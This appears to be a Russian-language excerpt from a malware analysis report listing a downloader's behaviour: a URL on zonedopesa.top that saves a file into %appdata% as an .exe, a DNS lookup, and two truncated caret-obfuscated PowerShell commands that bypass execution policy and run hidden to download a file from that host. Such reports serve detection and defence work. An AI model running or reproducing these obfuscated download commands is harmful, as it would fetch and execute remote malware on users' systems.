Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWerS^heL^l.exe^ ^-^exeCuTi^O^Npol^ICY bYp^asS -nOpR^O^fI^L^e -WIN^Do^w^St^Yle^ HidDe^N (^N^eW-o^Bje^cT ^S^Y^s^t^eM^.ne^T.Web^cl^iE^N^T).^DOw^Nl^OADFilE('http://www.zonedop...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "PoWerS^heL^l.exe^ ^-^exeCuTi^O^Npol^ICY bYp^asS -nOpR^O^fI^L^e -WIN^Do^w^St^Yle^ HidDe^N (^N^eW-o^Bje^cT ^S^Y^s^t^eM^.ne^T.Web^cl^iE^N^T).^DOw^Nl^OADFilE('http://www.zonedop...' (со скрытым окном)